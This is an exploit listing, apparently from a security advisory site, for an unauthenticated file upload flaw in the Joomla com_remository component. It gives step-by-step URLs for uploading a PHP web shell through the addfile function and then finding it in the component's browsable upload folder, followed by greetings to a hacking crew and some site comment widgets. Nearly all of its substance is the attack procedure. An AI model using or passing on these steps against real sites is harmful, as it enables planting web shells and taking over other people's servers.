Joomla com_remository Remote Upload File

2017.01.03
Credit: K33P-S1L3NT
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################# E X P L O I T ################### 1. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile 2. Add your php file , example : shell.php 3. http://www.Target.com/components/com_remository_files/ <= Directory Folder 4. If web server alowe to see directory you can see folder example : file_image_1 5. You can find your shell in lates file_image_[latest Number] 6. Example URL : http://www.example.com/components/com_remository_files/file_image_1/12761347shell.php Grets : Overload Team | Admiral | i.am_geek | MR.LEGEND | 1!0N7!N | s1pUT | zbyte | Badaki | Indonesia People

References:

https://www.facebook.com/loading.gov


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top